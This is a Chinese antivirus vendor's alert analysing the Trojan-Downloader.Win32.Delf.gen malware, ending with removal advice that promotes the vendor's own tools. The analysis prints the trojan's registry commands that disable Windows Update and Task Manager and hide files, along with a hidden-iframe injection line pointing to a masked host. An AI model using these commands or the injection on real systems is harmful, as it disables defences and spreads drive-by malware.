安全警报：Trojan-Downloader.Win32.Delf.gen

　　超级巡警团队监测到恶意程序Trojan-Downloader.Win32.Delf.gen变种发布速度很快，并且针对大多数反病毒软件进行了相应的处理，以逃避被查杀。该程序不仅会在网页文件中插入恶意框架代码，通过多种系统或应用程序漏洞传播木马，还会释放利用系统自动运行功能的autorun.inf文件及相应文件。

　　一、病毒相关分析：

　　病毒标签：

　　病毒名称：Trojan-Downloader.Win32.Delf.gen

　　病毒类型：木马下载者

　　危害级别：3

　　感染平台：Windows

　　病毒大小：34，424（字节）

　　SHA1　　：0801dacd6a579ec5f0ed5d97e7f336b59ea2fbb9

　　加壳类型：未知

　　开发工具：Delphi

　　病毒行为：

　　1、程序运行后，释放文件：

　　%System%\Systom.exe

　　%System%\auToRun.inf

　　并在磁盘各个分区释放文件sos.exe和auToRun.inf

　　2、执行以下命令，修改注册表：

　　reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate" /v

　　DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f　//禁用系统自动升级

　　reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v

　　DisableTaskMgr /t REG_dword /d 00000001 /f　　　　　　　//禁用任务管理器

　　reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced" /v Hidden /t

　　reg_dWord /d 00000000 /f                                //隐藏文件

　　reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt

　　/t reg_dword /d 00000001 /f                             //隐藏扩展名

　　reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden

　　/t reg_dword /d 00000000 /f                             //隐藏文件

　　reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"

　　/v CheckedValue /t REG_SZ /d 0 /f                       //隐藏文件

　　reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN"

　　/v CheckedValue /t REG_dword /d 00000002 /f             //隐藏文件

　　3、下载文件：

　　http://*****/1.txt

　　http://*****/2.txt

　　http://*****/3.txt

　　其中1.txt内容为：

　　http://*****/mh.exe

　　http://*****/ok.exe

　　http://*****/Server.exe

　　http://*****/uc.exe

　　http://*****/t/servere.exe

　　下载以上文件并重命名为？svchs0t.exe复制到系统目录%System%下    //？为从0开始数字

　　其中2.txt内容为：

　　360安全卫士

　　卡巴

　　瑞星

　　麦咖啡

　　NOD32

　　木马

　　防火墙

　　专杀工具

　　4、监控并关闭含有“病毒、木马、检测、wpe”等字符的窗体

　　5、在磁盘中所有网页文件尾部插入框架代码链接网马地址：

　　<IfrAmE src=http://*****/index.htm width=50 height=0></IfrAmE>

　　index.htm文件内容与网马利用漏洞如下图：

　　二、解决方案

　　推荐方案：

　　1、安装超级巡警进行全面病毒查杀。超级巡警用户请升级到最新病毒库，并进行全盘扫描。

　　2、升级系统及应用程序到最新版本。

　　3、选择超级巡警“工具”中“智能扫描”功能中的“清除指定代码”，进行全盘扫描并清除插入网页文件中的框架

　　代码。

　　超级巡警下载地址：http://www.dswlab.com/d1.html

　　三、安全建议

　　1、立即安装或更新防病毒软件并对内存和硬盘全面扫描（推荐安装超级巡警）。

　　2、根据实际安全级别需要适当考虑选用防火墙，并进行正确的设置。

　　3、使用超级巡警的补丁检查功能，及时安装系统补丁。

　　4、禁用或删除不必要的的帐号，对管理员帐号设置一个强壮的密码。

　　5、禁用不必要的服务。

　　6、及时更新常用软件，尤其是聊天工具。

　　7、不要随意下载不安全网站的文件并运行。

　　8、下载和新拷贝的文件要首先进行查毒。

　　9、不要轻易打开即时通讯工具中发来的链接或可执行文件。

　　10、使用移动存储介质进行数据访问时，先对其进行病毒检查，建议使用超级巡警U盘免疫器进行免疫。

　　注： %System% 是一个可变路径，在windows95/98/me中该变量是指%Windir%\System，在WindowsNT/2000/XP/2003/VISTA中该变

　　量指%Windir%\System32。其它：

　　%SystemDrive% 　　     　　 系统安装的磁盘分区

　　%SystemRoot% = %Windir% 　　WINDODWS系统目录

　　%ProgramFiles%　 　 　　　　应用程序默认安装目录

　　%AppData% 　　     　　     应用程序数据目录

　　%CommonProgramFiles%　　    公用文件目录

　　%HomePath% 　　     　　    当前活动用户目录

　　%Temp% =%Tmp% 　　     　　 当前活动用户临时目录

　　%DriveLetter% 　　     　　 逻辑驱动器分区

　　%HomeDrive% 　　　     　　 当前用户系统所在分区